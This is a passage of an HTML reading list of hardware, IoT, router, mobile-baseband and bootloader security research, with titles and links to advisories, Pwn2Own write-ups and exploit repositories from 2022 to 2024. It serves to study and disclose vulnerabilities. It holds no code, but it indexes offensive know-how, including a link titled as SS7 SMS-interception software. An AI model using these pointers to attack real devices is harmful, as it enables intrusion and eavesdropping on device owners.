href="https://dfir.ru/2024/01/15/cve-2023-4001-a-vulnerability-in-the-downstream-grub-boot-manager/">CVE-2023-4001: a vulnerability in the (downstream) GRUB boot manager</a></li><li><a href="https://blog.quarkslab.com/pixiefail-nine-vulnerabilities-in-tianocores-edk-ii-ipv6-network-stack.html?utm_source=pocket_reader">PixieFail: Nine vulnerabilities in Tianocore’s EDK II IPv6 network stack</a></li></ul>
<h2 id="2023"><a href="#2023" class="headerlink" title="2023"></a>2023</h2><ul><li><a href="https://github.com/asset-group/5ghoul-5g-nr-attacks">5Ghoul - 5G NR Attacks & 5G OTA Fuzzing</a></li><li><a href="https://francozappa.github.io/post/2023/bluffs-ccs23/">BLUFFS: Bluetooth Forward and Future Secrecy Attacks and Defenses</a></li><li><a href="https://www.forescout.com/blog/sierra21-supply-chain-vulnerabilities-iot-ot-routers/">Forescout Vedere Labs discloses 21 new vulnerabilities affecting OT/IoT routers</a></li><li><a href="https://research.nccgroup.com/2023/08/11/syspwn-vr-for-pwn2own/">SysPWN – VR for Pwn2Own</a></li><li><a href="https://www.whid.ninja/blog/denial-of-pleasure-attacking-unusual-ble-targets-with-a-flipper-zero">Denial of Pleasure: Attacking Unusual BLE Targets with a Flipper Zero</a></li><li><a href="https://www.synopsys.com/blogs/software-security/cve-2020-7958-trustlet-tee-attack.html">Understanding CVE-2020-7958: Biometric Data Extraction in Android</a></li><li><a href="https://www.cyberark.com/resources/all-blog-posts/nvme-new-vulnerabilities-made-easy">NVMe: New Vulnerabilities Made Easy</a></li><li><a href="https://mp.weixin.qq.com/s/jRa_IjOgxxyqPICcqVvUzA">[TrustZone vulnerability reading guide] Exploring the security landscape of the Surge S1</a></li><li><a href="https://o0xmuhe.github.io/2022/11/23/议题解读-MOSEC2022-MediAttack-break-the-boot-chain-of-MediaTek-SoC/">Talk study: MOSEC2022 MediAttack - break the boot chain of MediaTek SoC</a></li><li><a href="https://www.nitrokey.com/news/2023/smartphones-popular-qualcomm-chip-secretly-share-private-information-us-chip-maker?page=1">Smartphones With Popular Qualcomm Chip Secretly Share Private Information With US Chip-Maker</a></li><li><a href="https://www.redteam-pentesting.de/en/advisories/rt-sa-2023-006/-d-link-dap-x1860-remote-command-injection">RedTeam Pentesting GmbH - D-Link DAP-X1860: Remote Command Injection</a></li>
<li><a href="https://starlabs.sg/blog/2023/06-the-old-the-new-and-the-bypass-one-clickopen-redirect-to-own-samsung-s22-at-pwn2own-2022/">The Old, The New and The Bypass - One-click/Open-redirect to own Samsung S22 at Pwn2Own 2022</a></li><li><a href="https://margin.re/2022/06/pulling-mikrotik-into-the-limelight/">Pulling MikroTik into the Limelight</a></li><li><a href="https://www.tetraburst.com/">TETRA:BURST | Midnight Blue</a></li><li><a href="https://blog.thalium.re/posts/rooting-xiaomi-wifi-routers/">Rooting Xiaomi WiFi Routers</a></li><li><a href="https://boschko.ca/glinet-router/">Vulnerabilities and Hardware Teardown of GL.iNET MT300N-V2</a></li><li><a href="https://www.nozominetworks.com/blog/dji-mavic-3-drone-research-part-1-firmware-analysis/">DJI Mavic 3 Drone Firmware Analysis</a></li><li><a href="https://labs.ioactive.com/2023/06/applying-fault-injection-to-firmware.html?m=1&utm_source=pocket_saves">Applying Fault Injection to the Firmware Update Process of a Drone</a> <a href="https://act-on.ioactive.com/acton/attachment/34793/f-b1aa96d0-bd78-4518-bae3-2889aae340de/1/-/-/-/-/DroneSec-GGonzalez.pdf">Paper</a></li><li><a href="https://stigward.github.io/posts/fiio-m6-exploit/">Rooting the FiiO M6 - Part 2 - Writing an LPE Exploit For Our Overflow Bug</a></li><li><a href="https://wzt.ac.cn/2023/05/12/spa112/">Cisco SPA112 firmware unpacking/repacking analysis</a></li><li><a href="https://claroty.com/team82/research/chaining-five-vulnerabilities-to-exploit-netgear-nighthawk-rax30-routers-at-pwn2own-toronto-2022">Pwn2Own Toronto 22: Exploit Netgear Nighthawk RAX30 Routers</a></li><li><a href="https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/">The Dragon Who Sold His Camaro: Analyzing Custom Router Implant</a></li><li><a href="https://drone-hacks.com/">Drone-Hacks, the best way to hack your DJI Drone</a></li><li><a href="https://kuenzi.dev/toothbrush/">Hacking my “smart” toothbrush</a></li>
<li><a href="https://twitter.com/atc1441/status/1662192314649833472">Teardown of the Disneyland entry band</a></li><li><a href="https://jcjc-dev.com/2023/03/19/reversing-domyos-el500-elliptical/">Practical Introduction to BLE GATT Reverse Engineering: Hacking the Domyos EL500 · Hack The World</a></li><li><a href="https://farlow.dev/2023/03/02/hacking-the-nintendo-dsi-browser">Hacking the Nintendo DSi Browser</a></li><li><a href="https://www.atomic14.com/2023/05/04/hue-light-hacking.html">Hue Light Hack</a></li><li><a href="https://www.greynoise.io/blog/debugging-d-link-emulating-firmware-and-hacking-hardware">Debugging D-Link: Emulating firmware and hacking hardware</a></li><li><a href="https://github.com/Mr-xn/BLACKHAT_Asia2023/blob/main/AS23-Xing-Dilemma-In-IoT-Access-Control.pdf">BLACKHAT_Asia2023/AS23-Xing-Dilemma-In-IoT-Access-Control</a></li><li><a href="https://blog.thalium.re/posts/fuzzing-samsung-system-services/">The Fuzzing Guide to the Galaxy: An Attempt with Android System Services</a></li><li><a href="https://www.synacktiv.com/publications/i-hack-u-boot.html">I hack, U-Boot</a></li><li><a href="https://robocoffee.de/?p=436">Hacking Brightway scooters: A case study</a></li><li><a href="https://github.com/Skiti/BreakMi">BreakMi: a security assessment toolkit for BLE fitness trackers</a></li><li><a href="https://www.freebuf.com/articles/endpoint/363738.html">Analysis of the China Telecom Tianyi Gateway 3.0 (Part 1)</a></li><li><a href="https://binarly.io/posts/Multiple_Vulnerabilities_in_Qualcomm_and_Lenovo_ARM_based_Devices/index.html">Multiple Vulnerabilities in Qualcomm and Lenovo ARM-based Devices</a></li><li><a href="https://www.ss7.dev/">SS7 Hack Software - How to hack SS7 and Intercept SMS</a></li><li><a href="https://www.ndss-symposium.org/ndss-paper/drone-security-and-the-mysterious-case-of-djis-droneid/">Drone Security and the Mysterious Case of DJI’s DroneID - NDSS Symposium</a></li>
<li><a href="https://googleprojectzero.blogspot.com/2023/03/multiple-internet-to-baseband-remote-rce.html">Project Zero: Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems</a></li><li><a href="https://research.aurainfosec.io/pentest/threat-on-your-desk-evil-usbc-dock/">The Threat on Your Desk: Building an Evil USB-C Dock · Aura Research Division</a></li><li><a href="https://www.tecsecurity.io/blog/tp-link_ax1800">PWNING THE TP-LINK AX1800 WIFI 6 ROUTER: UNCOVERED AND EXPLOITED A MEMORY CORRUPTION VULNERABILITY</a></li><li><a href="https://labs.taszk.io/articles/post/reunzip/">REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB - taszk.io labs</a></li><li><a href="https://hackmd.io/@pepsipu/ry-SK44pt?s=09">Nightmare: One Byte to ROP // Deep Dive Edition</a></li><li><a href="https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html?m=1">Exploiting CVE-2022-42703 - Bringing back the stack attack</a></li><li><a href="https://www.thegoodpenguin.co.uk/blog/pcie-dma-attack-against-a-secured-jetson-nano-cve-2022-21819/">CVE-2022-21819 | PCIe DMA Attack against a secured Jetson Nano</a></li><li><a href="https://www.flashback.sh/blog/weekend-destroyer-wd-pr4100-rce">WEEKEND DESTROYER - RCE in Western Digital PR4100 NAS</a></li><li><a href="https://mccaulay.co.uk/mast1c0re-introduction-exploiting-the-ps4-and-ps5-through-a-gamesave/">mast1c0re: Introduction – Exploiting the PS4 and PS5 through a game save – McCaulay</a></li><li><a href="https://blog.the.al/2023/01/01/ds4-reverse-engineering.html">DualShock4 Reverse Engineering</a></li><li><a href="https://github.com/PabloMK7/ENLBufferPwn">PabloMK7/ENLBufferPwn: Information and PoC about the ENLBufferPwn vulnerability</a></li>
<li><a href="https://blog.dixitaditya.com/manipulating-aes-traffic-using-a-chain-of-proxies-and-hardcoded-keys">Manipulating AES Traffic using a Chain of Proxies and Hardcoded Keys</a></li><li><a href="https://cq674350529.github.io/2023/02/10/Analyzing-an-Old-Netatalk-dsi-writeinit-Buffer-Overflow-Vulnerability-in-NETGEAR-Router/">Analyzing an Old Netatalk dsi_writeinit Buffer Overflow Vulnerability in NETGEAR Router</a></li><li><a href="https://github.com/b1ack0wl/vulnerability-write-ups/blob/master/TP-Link/WR940N/112022/Part1.md">When an N-Day turns into a 0day. (Part 1 of 2)</a></li><li><a href="https://github.com/scarvell/advisories/blob/main/2022_netcomm_nf20mesh_unauth_rce.md">Netcomm - Unauthenticated Remote Code Execution</a></li><li><a href="https://github.com/MlgmXyysd/Xiaomi-HyperOS-BootLoader-Bypass">Xiaomi-HyperOS-BootLoader-Bypass</a></li><li><a href="https://blog.ornx.net/post/bluetooth-volume-fix/">Fixing the Volume on my Bluetooth Earbuds</a></li><li><a href="https://labs.taszk.io/articles/post/full_chain_bb_part1/">Full Chain Baseband Exploits</a></li><li><a href="https://haxx.in/posts/hacking-canon-imageclass/">Hacking the Canon imageCLASS MF742Cdw/MF743Cdw (again)</a></li><li><a href="https://github.com/actuator/com.tcl.browser/blob/main/CWE-94.md">A Remote Code Execution (RCE) vulnerability has been discovered in the com.tcl.browser application</a></li><li><a href="https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997">Building an Exploit for FortiGate Vulnerability CVE-2023-27997</a></li><li><a href="https://jfrog.com/blog/xorg-libx11-vulns-cve-2023-43786-cve-2023-43787-part-one/">CVE-2023-43786 & CVE-2023-43787 Vulns in libX11: All You Need To Know</a></li><li><a href="https://blog.quarkslab.com/our-pwn2own-journey-against-time-and-randomness-part-1.html">A journey into the Pwn2Own contest. 
Part 1: Netgear RAX30 router WAN vulnerabilities</a></li><li><a href="https://blog.quarkslab.com/starlink.html">Diving into Starlink’s User Terminal Firmware</a> </li><li><a href="https://research.nccgroup.com/2023/12/04/shooting-yourself-in-the-flags-jailbreaking-the-sonos-era-100">research.nccgroup.com/2023/12/04/shooting-yourself-in-the-flags-jailbreaking-the-sonos-era-100/</a></li><li><a href="https://eprint.iacr.org/2023/090.pdf">Unlimited Results: Breaking Firmware Encryption of ESP32-V3</a></li></ul><h2 id="2022"><a href="#2022" class="headerlink" title="2022"></a>2022</h2><ul><li><a href="https://blog.quarkslab.com/attacking-titan-m-with-only-one-byte.html">Attacking Titan M with Only One Byte</a></li><li><a href="https://github.com/H4ckd4ddy/bypass-sentry-safe">bypass-sentry-safe</a></li><li><a href="https://github.com/infobyte/cve-2022-27255">CVE-2022-27255 - Realtek eCos SDK SIP ALG buffer overflow</a></li><li><a href="https://bwlryq.net/posts/vlan_hopping/">Networking - VLAN Hopping</a></li><li><a href="https://research.nccgroup.com/2022/12/19/meshyjson-a-tp-link-tdpserver-json-stack-overflow/">MeshyJSON: A TP-Link tdpServer JSON Stack Overflow</a></li><li><a href="https://starlabs.sg/blog/2022/12-the-last-breath-of-our-netgear-rax30-bugs-a-tragic-tale-before-pwn2own-toronto-2022/">The Last Breath of Our Netgear RAX30 Bugs - A Tragic Tale before Pwn2Own Toronto 2022</a></li><li><a href="https://www.synacktiv.com/publications/cool-vulns-dont-live-long-netgear-and-pwn2own.html">Cool vulns don’t live long - Netgear and Pwn2Own</a></li><li><a href="https://www.g3gg0.de/wordpress/fpv/fpv-analysis-of-tbs-crossfire/">Analysis of TBS Crossfire, reverse engineering the air link</a></li><li><a href="https://voidstarsec.com/blog/uart-uboot-and-usb">Intro to Embedded RE: UART Discovery and Firmware Extraction via UBoot</a></li><li><a href="https://security.humanativaspa.it/a-journey-into-iot-unknown-chinese-alarm-part-4-internal-communications/">A journey into IoT 
- Unknown Chinese alarm - Part 4 - Internal communications </a></li><li><a href="https://cyberintel.es/publications/2022-12-07_BlackHat_Europe_pub/">Vlind Glitch: A Blind VCC Glitching Technique to Bypass the Secure Boot of the Qualcomm MSM8916 Mobile SoC</a></li><li><a href="https://security.humanativaspa.it/zyxel-authentication-bypass-patch-analysis-cve-2022-0342/">Zyxel authentication bypass patch analysis (CVE-2022-0342)</a></li><li><a href="https://blog.impalabs.com/2212_huawei-security-hypervisor.html">Shedding Light on Huawei’s Security Hypervisor</a></li><li><a href="https://blog.impalabs.com/2212_advisory_huawei-security-hypervisor.html">Huawei Security Hypervisor Vulnerability </a></li><li><a href="https://github.com/scarvell/advisories/blob/main/2022_netcomm_nf20mesh_unauth_rce.md">Netcomm - Unauthenticated Remote Code Execution </a></li><li><a href="https://research.nccgroup.com/2022/12/22/puckungfu-a-netgear-wan-command-injection/">Puckungfu: A NETGEAR WAN Command Injection</a></li><li><a href="https://blog.impalabs.com/2103_reversing-samsung-npu.html">Reversing and Exploiting Samsung’s NPU</a> <a href="https://blog.impalabs.com/2110_exploiting-samsung-npu.html">PART2</a></li><li><a href="https://github.blog/2022-06-16-the-android-kernel-mitigations-obstacle-race/">The Android kernel mitigations obstacle race</a></li><li><a href="https://www.pentestpartners.com/security-blog/moto-e20-readback-vulnerability/">Moto E20 Readback Vulnerability</a></li><li><a href="https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google-pixel-lock-screen-bypass/">Accidental $70k Google Pixel Lock Screen Bypass</a></li><li><a href="https://vulncheck.com/blog/xiongmai-iot-exploitation">Xiongmai IoT Exploitation</a></li><li><a href="https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce">TP-Link Tapo c200 Unauthenticated RCE</a></li><li><a href="http://www.hydrogen18.com/blog//hacking-zyxel-ip-cameras-pt-1.html">Hacking Zyxel IP cameras to gain a root 
shell</a></li><li><a href="https://www.anquanke.com/post/id/283630#h3-16">Tenda Ax12 device analysis</a></li><li><a href="https://arxiv.org/pdf/1910.03895.pdf">BrokenStrokes: On the (in)Security of Wireless Keyboards</a></li><li><a href="https://research.nccgroup.com/2022/11/17/cve-2022-45163/">NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)</a></li><li><a href="https://cybervelia.com/?p=1380">Hacking Smartwatches for Spear Phishing</a></li><li><a href="https://nns.ee/blog/2021/04/03/modem-rce.html">Code execution as root via AT commands on the Quectel EG25-G modem</a></li><li><a href="https://exfiles.eu/wp-content/uploads/2022/07/EXFILES-D5.1-Vulnerabilities-analysis-and-attack-scenarios-description-PU-M06.pdf">Extract Forensic Information for LEAs from Encrypted SmartPhones</a></li><li><a href="https://www.immunit.ch/blog/2022/10/26/ethernet-ghosting-nac-bypass/">immunIT – Ethernet ghosting & NAC bypass</a></li><li><a href="https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-UWB-Real-Time-Locating-Systems.pdf">Nozomi-Networks-WP-UWB-Real-Time-Locating-Systems</a> <a href="https://github.com/NozomiNetworks/blackhat22-uwb-rtls">uwb-rtls</a></li><li><a href="https://research.nccgroup.com/2022/10/03/shining-new-light-on-an-old-rom-vulnerability/">Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices</a></li><li><a href="https://rambo.codes/posts/2022-10-25-sirispy-ios-bug-allowed-apps-to-eavesdrop">SiriSpy - iOS bug allowed apps to eavesdrop on your conversations with Siri</a></li><li><a href="https://hackerone.com/reports/1340942">size_t-to-int vulnerability in exFAT leads to memory corruption via malformed USB flash drives</a></li><li><a href="https://margin.re/blog/pulling-mikrotik-into-the-limelight.aspx">Pulling MikroTik into the Limelight</a></li><li><a href="https://eshard.com/posts/pixel6_bootloader">Pixel6: Booting up (part 1)</a></li><li><a 
href="https://eshard.com/posts/pixel6bootloader-2">Pixel 6 bootloader: Emulation, ROP(part 2)</a></li><li><a href="https://eshard.com/posts/pixel6_bootloader_3">Pixel 6 Bootloader: Exploitation (part 3)</a></li><li><a href="https://research.nccgroup.com/2022/10/03/shining-new-light-on-an-old-rom-vulnerability/">Shining New Light on an Old ROM Vulnerability: Secure Boot Bypass via DCD and CSF Tampering on NXP i.MX Devices</a></li><li><a href="https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/">FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass Technical Deep Dive (CVE-2022-40684)</a></li><li><a href="https://onekey.com/blog/security-advisory-netgear-routers-funjsq-vulnerabilities/">Security Advisory: NETGEAR Routers FunJSQ Vulnerabilities</a></li><li><a href="https://github.com/infobyte/cve-2022-27255">CVE-2022-27255 - Realtek eCos SDK SIP ALG buffer overflow</a></li><li><a href="https://github.com/mich01/SpiderSMS">SpiderSMS: An End to End Encrypted SMS and SMS Tunneling app</a></li><li><a href="https://samy.link/blog/contec-flexlan-fxa2000-and-fxa3000-series-vulnerability-repo">Contec FLEXLAN FXA2000 and FXA3000 series vulnerability report which provide WiFi on airplanes</a></li><li><a href="https://onekey.com/blog/security-advisory-netgear-routers-funjsq-vulnerabilities/">Security Advisory: NETGEAR Routers FunJSQ Vulnerabilities</a></li><li><a href="https://maxwelldulin.com/BlogPost?post=8579892224">When Athletic Abilities Just Aren’t Enough - Scoreboard Hacking Part 1</a></li><li><a href="https://nns.ee/blog/2022/08/05/routeros-container-rce.html">Symlinks as mount portals: Abusing container mount points on MikroTik’s RouterOS to gain code execution</a></li><li><a href="https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-ezviz-smart-cams">Vulnerabilities Identified in EZVIZ Smart Cams</a> <a 
href="https://www.bitdefender.com/files/News/CaseStudies/study/423/Bitdefender-PR-Whitepaper-EZVIZ-creat6311-en-EN.pdf">whitepaper</a></li><li><a href="https://fresh-eggs.github.io/xband_post.html">Exploring the XBAND Video Game Modem and Executing Arbitrary Code Over a Phone Line in 2022</a></li><li><a href="https://tamirzb.com/attacking-android-kernel-using-qualcomm-trustzone">Attacking the Android kernel using the Qualcomm TrustZone</a></li><li><a href="https://www.nozominetworks.com/blog/vulnerability-in-dahua-s-onvif-implementation-threatens-ip-camera-security/">Vulnerability in Dahua’s ONVIF Implementation Threatens IP Camera Security</a></li><li><a href="https://www.rapid7.com/blog/post/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/">QNAP Poisoned XML Command Injection (Silently Patched)</a></li><li><a href="https://mp.weixin.qq.com/s/6vLHD90P7x86O4QfyPfobA">Analysis and attack of a smart wristband</a></li><li><a href="https://github.com/KULeuven-COSIC/Starlink-FI">Starlink User Terminal Modchip</a></li><li><a href="https://research.checkpoint.com/2022/vulnerability-within-the-unisoc-baseband/">Vulnerability within the UNISOC baseband opens mobile phones communications to remote hacker attacks</a></li><li><a href="https://blog.viettelcybersecurity.com/cve-2022-1040-sophos-xg-firewall-authentication-bypass/">CVE-2022-1040 Sophos XG Firewall Authentication bypass (viettelcybersecurity.com)</a></li><li><a href="https://blog.esp0x31.io/zathura-selinux-confined/">SELinux confined</a></li><li><a href="https://raelize.com/blog/qualcomm-ipq40xx-analysis-of-critical-qsee-vulnerabilities/">Qualcomm IPQ40xx: Analysis of Critical QSEE Vulnerabilities</a></li><li><a href="https://github.com/MarginResearch/FOISted">FOISted: MikroTik remote jailbreak for v6.x.x</a></li><li><a href="https://i.blackhat.com/asia-21/Thursday-Handouts/as-21-Johnson-Unprotected-Broadcasts-In-Android-9-and-10-wp.pdf">(Un)protected Broadcasts in Android 9 and 10</a></li><li><a 
href="https://www.zerodayinitiative.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack">CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack</a></li><li><a href="https://muffsec.com/blog/ics-pwn2own-2022/">randy: A pre-authenticated RCE exploit for Inductive Automation Ignition(Bypass,RCE)</a> <a href="https://github.com/sourceincite/randy">Source</a></li><li><a href="https://onekey.com/blog/advisory-festo-cecc-x-m1-command-injection-vulnerabilities/">FESTO: CECC-X-M1 - Command Injection Vulnerabilities</a></li><li><a href="https://www.pnfsoftware.com/blog/reversing-simatic-s7-plc-programs/">Reversing Simatic S7 PLC Programs</a></li><li><a href="https://blog.coffinsec.com/research/2022/07/02/orbi-nday-exploit-cve-2020-27861.html">CVE-2020-27861 nday exploit: netgear orbi unauthenticated command injection</a></li><li><a href="https://comsec.ethz.ch/research/microarch/retbleed/">Retbleed: Arbitrary Speculative Code Execution with Return Instructions</a></li><li><a href="https://www.sstic.org/2022/presentation/intel_wifi/">Ghost in the Wireless, iwlwifi edition</a></li><li><a href="https://www.secura.com/blog/tpm-sniffing-attacks-against-non-bitlocker-targets">TPM Sniffing Attacks Against Non-Bitlocker Targets</a></li><li><a href="https://github.com/H4ckd4ddy/bypass-sentry-safe">A vulnerability allows opening electronic safes from the Sentry Safe and Master Lock company without any pin code.</a></li><li><a href="https://security.humanativaspa.it/multiple-vulnerabilities-in-zyxel-zysh/">Multiple vulnerabilities in Zyxel zysh</a></li><li><a href="https://garyodernichts.blogspot.com/2022/06/exploiting-wii-us-usb-descriptor-parsing.html?m=1">Gary’s hacking stuff: Exploiting the Wii U’s USB Descriptor parsing </a></li><li><a href="https://margin.re/blog/pulling-mikrotik-into-the-limelight.aspx">Pulling MikroTik into the Limelight</a></li><li><a 
href="https://blog.xilokar.info/firmware-key-extraction-by-gaining-el3.html">Firmware key extraction by gaining EL3</a></li><li><a href="https://labs.ioactive.com/2022/04/satellite-insecurity-vulnerability.html">Satellite (In)security: Vulnerability Analysis of Wideye SATCOM Terminals</a></li><li><a href="https://mp.weixin.qq.com/s/4MCmx4zrNL-nd6J3Y1Bp3g">Black Hat Asia 2022 talk walkthrough: Unix Domain Socket: A Hidden Door to Privilege Escalation in the Android Ecosystem</a></li><li><a href="https://research.nccgroup.com/2022/05/31/hardware-security-by-design-esp32-guidance/">Hardware Security By Design: ESP32 Guidance</a></li><li><a href="https://www.synacktiv.com/en/publications/the-printer-goes-brrrrr.html">The printer goes brrrrr!!! (heap overflow)</a></li><li><a href="https://www.nozominetworks.com/blog/nozomi-networks-discovers-unpatched-dns-bug-in-popular-c-standard-library-putting-iot-at-risk/?utm_source=pocket_mylist">Nozomi Networks Discovers Unpatched DNS Bug in Popular C Standard Library Putting IoT at Risk</a></li><li><a href="https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/">Microsoft finds new elevation of privilege Linux vulnerability (D-Bus)</a></li><li><a href="https://www.contextis.com/en/blog/hacking-canon-pixma-printers-doomed-encryption">Hacking Canon Pixma Printers - Doomed Encryption</a></li><li><a href="https://oxide.computer/blog/another-vulnerability-in-the-lpc55s69-rom">Another vulnerability in the LPC55S69 ROM</a></li><li><a href="https://oxide.computer/blog/lpc55">Exploiting Undocumented Hardware Blocks in the LPC55S69</a></li><li><a href="https://research.nccgroup.com/2022/03/24/remote-code-execution-on-western-digital-pr4100-nas-cve-2022-23121/">CVE-2022-23121: Remote Code Execution on Western Digital PR4100 NAS</a></li><li><a href="https://olegkutkov.me/2021/12/25/analysis-and-reverse-engineering-of-the-original-starlink-router/">Analysis and reverse-engineering of the original Starlink router</a></li><li><a 
href="https://iothacking.notion.site/AcidRain-VIASAT-89233c7ee1cc4da2aa75f5157364c943">AcidRain | Analysis of the attack on the VIASAT commercial satellite communication system</a></li><li><a href="https://blog.xilokar.info/pwning-the-bcm61650.html">Pwning the bcm61650</a></li><li><a href="https://mp.weixin.qq.com/s/98YDkBrg0XZe32NLNnn5JQ">TP-Link-WDR-7660 VxWorks router security research: firmware analysis</a></li><li><a href="https://devco.re/blog/2022/03/28/your-NAS-is-not-your-NAS/">Your NAS is not your NAS!</a></li><li><a href="https://blog.relyze.com/2022/04/pwning-cisco-rv340-with-4-bug-chain.html">Advanced Software Analysis: Pwning a Cisco RV340 with a 4 bug chain exploit</a></li><li><a href="https://blog.relyze.com/2022/03/cve-2022-27643-netgear-r6700v3-upnpd.html">Advanced Software Analysis: CVE-2022-27643 - NETGEAR R6700v3 upnpd Buffer Overflow Remote Code Execution Vulnerability</a></li><li><a href="https://www.synacktiv.com/publications/pwn2own-austin-2021-defeating-the-netgear-r6700v3.html">Pwn2Own Austin 2021: Defeating the Netgear R6700v3</a></li><li><a href="https://medium.com/tenable-techblog/a-backdoor-lockpick-d847a83f4496">A Backdoor Lockpick. 
Reversing and Subverting Phicomm’s…</a></li><li><a href="https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc">Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router </a></li><li><a href="https://binarly.io/posts/AMI_UsbRt_Repeatable_Failures_A_6_year_old_attack_vector_still_affecting_millions_of_enterprise_devices/index.html">Repeatable Failures:AMI UsbRt - Six years later, firmware attack vector still affect millions of enterprise devices</a></li><li><a href="https://www.shielder.com/blog/2022/03/reversing-embedded-device-bootloader-u-boot-p.1/">Shielder - Reversing embedded device bootloader (U-Boot) - p.1</a></li><li><a href="https://www.shielder.com/blog/2022/03/reversing-embedded-device-bootloader-u-boot-p.2/">Shielder - Reversing embedded device bootloader (U-Boot) - p.2</a></li><li><a href="https://ssd-disclosure.com/ssd-advisory-netgear-dgnd3700v2-preauth-root-access/">Longue vue : an exploit chain that can compromise over the internet NETGEAR DGND3700v2 devices.</a> <a href="https://github.com/0vercl0k/longue-vue">Github</a> </li><li><a href="https://security.humanativaspa.it/a-journey-into-iot-unknown-chinese-alarm-part-1-discover-components-and-ports/">A journey into IoT - Unknown Chinese alarm - Part 1 - Discover components and ports</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity22/presentation/kotuliak">LTrack: Stealthy Tracking of Mobile Phones in LTE</a></li><li><a href="https://www.anquanke.com/post/id/267183">Real World CTF Trust or Not Wp</a></li><li><a href="https://www.armis.com/research/pwnedpiper">PwnedPiper:Nine vulnerabilities in critical infrastructure used by 80% of major hospitals in North America.</a></li><li><a href="https://labs.taszk.io/articles/post/huawei_kirin990_bootrom_patch/">Test Point Break: Analysis of Huawei’s OTA Fix For BootROM Vulnerabilities</a></li><li><a 
href="https://i.blackhat.com/USA21/Wednesday-Handouts/US-21-Komaromy-How-To-Tame-Your-Unicorn-wp.pdf">How To Tame Your Unicorn: Exploring And Exploiting Zero-Click Remote Interfaces of Huawei Smartphones</a></li><li><a href="https://labs.taszk.io/articles/post/mtk_baseband_csn1_exploitation/">Exploiting CSN.1 Bugs in MediaTek Basebands</a></li><li><a href="https://labs.taszk.io/articles/post/unbox_your_phone_1/">Unbox Your Phone —— reverse engineering and exploiting Samsung’s TrustZone</a></li><li><a href="https://www.armis.com/research/tlstorm/">TLStorm: Three critical vulnerabilities discovered in APC Smart-UPS devices can allow attackers to remotely manipulate the power of millions of enterprise devices.</a></li><li><a href="https://www.binarly.io/posts/Repeatable_Firmware_Security_Failures_16_High_Impact_Vulnerabilities_Discovered_in_HP_Devices/index.html">Repeatable Firmware Security Failures:16 High Impact Vulnerabilities Discovered in HP Devices</a></li><li><a href="https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/">CVE-2022-24990: TerraMaster TOS unauthenticated remote command execution via PHP Object Instantiation</a></li><li><a href="https://www.ava-attack.org/">Alexa vs Alexa(AvA)</a></li><li><a href="https://research.nccgroup.com/2022/02/28/brokenprint-a-netgear-stack-overflow/">BrokenPrint: A Netgear stack overflow</a></li><li><a href="https://github.com/parsdefense/CVE-2021-1965">CVE-2021-1965: WiFi Zero Click RCE Trigger PoC</a></li><li><a href="https://eprint.iacr.org/2022/208.pdf">Trust Dies in Darkness: Shedding Light on Samsung’s TrustZone Keymaster Design</a></li><li><a href="https://github.com/synacktiv/samsung-q60t-exploit">samsung-q60t-exploit: Exploit and firmware decryption script</a> <a href="https://www.synacktiv.com/sites/default/files/2021-11/GreHack2021_Rooting_Samsung_Q60T_Smart_TV.pdf">Slides</a> <a 
href="https://www.youtube.com/watch?v=c_7I1j8kjgI">Video</a></li><li><a href="https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md">flashback_connects (Cisco RV340 SSL VPN Unauthenticated Remote Code Execution as root)</a></li><li><a href="https://github.com/parsdefense/CVE-2021-1965">CVE-2021-1965: CVE-2021-1965 WiFi Zero Click RCE Trigger PoC</a></li><li><a href="https://research.nccgroup.com/2022/02/18/analyzing-a-pjl-directory-traversal-vulnerability-exploiting-the-lexmark-mc3224i-printer-part-2/">Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2) </a></li><li><a href="https://research.nccgroup.com/2022/02/17/bypassing-software-update-package-encryption-extracting-the-lexmark-mc3224i-printer-firmware-part-1/">Bypassing software update package encryption – extracting the Lexmark MC3224i printer firmware (part 1) </a></li><li><a href="https://github.com/0vercl0k/zenith">0vercl0k/zenith: Zenith exploits a memory corruption vulnerability in the NetUSB driver to get remote-code execution on the TP-Link Archer C7 V5 router for Pwn2Own Austin 2021. 
